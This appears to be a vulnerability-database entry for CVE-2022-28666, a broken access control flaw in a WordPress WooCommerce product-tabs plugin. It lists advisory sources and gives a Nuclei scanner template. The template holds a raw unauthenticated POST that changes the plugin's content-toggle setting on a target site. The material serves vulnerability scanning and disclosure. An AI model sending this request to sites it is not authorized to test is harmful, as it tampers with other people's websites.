| Title | Published | Reporter |
|---|---|---|
| CVE-2022-28666 | 28 Jun 2022 13:19 | attackerkb |
| CVE-2022-28666 | 21 Jul 2022 20:18 | circl |
| WordPress plugin YIKES Inc. Custom Product Tabs for WooCommerce Authorization Issue Vulnerability | 21 Jul 2022 00:00 | cnnvd |
| CVE-2022-28666 | 21 Jul 2022 16:59 | cve |
| CVE-2022-28666 WordPress Custom Product Tabs for WooCommerce plugin <= 1.7.7 - Broken Access Control vulnerability | 21 Jul 2022 16:59 | cvelist |
| EUVD-2022-33108 | 3 Oct 2025 20:07 | euvd |
| CVE-2022-28666 | 21 Jul 2022 17:15 | nvd |
| WordPress Custom Product Tabs for WooCommerce Plugin <= 1.7.7 Improper Authentication Vulnerability | 17 Aug 2023 00:00 | openvas |
| CVE-2022-28666 | 21 Jul 2022 17:15 | osv |
| WordPress Custom Product Tabs for WooCommerce plugin <= 1.7.7 - Broken Access Control vulnerability leading to &yikes-the-content-toggle option update | 28 Jun 2022 00:00 | patchstack |
```yaml
id: CVE-2022-28666

info:
  name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
  author: Sourabh-Sahu
  severity: medium
  description: |
    YIKES Inc. Custom Product Tabs for WooCommerce plugin <= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
  impact: |
    Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
  remediation: |
    Update to the latest version of the plugin, above 1.7.7.
  reference:
    - https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28666
    epss-score: 0.01226
    epss-percentile: 0.65162
    cwe-id: CWE-287
    cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "yikes-inc-easy-custom"
  tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive

http:
  - raw:
      - |
        POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

        toggle_the_content=false

    # All three conditions must hold: a JSON 200 response whose body reports the setting update succeeded
    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'success','Settings updated')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450221009a95f1621d4f7a9eda11040385cd5af4197794606361500ec115ad02dc50b78002205fc27fe93f993a921f11e3a40dc4b21264c3a383d68e253e350641c422b00b90:922c64590222798bb761d5b6d8e72950
```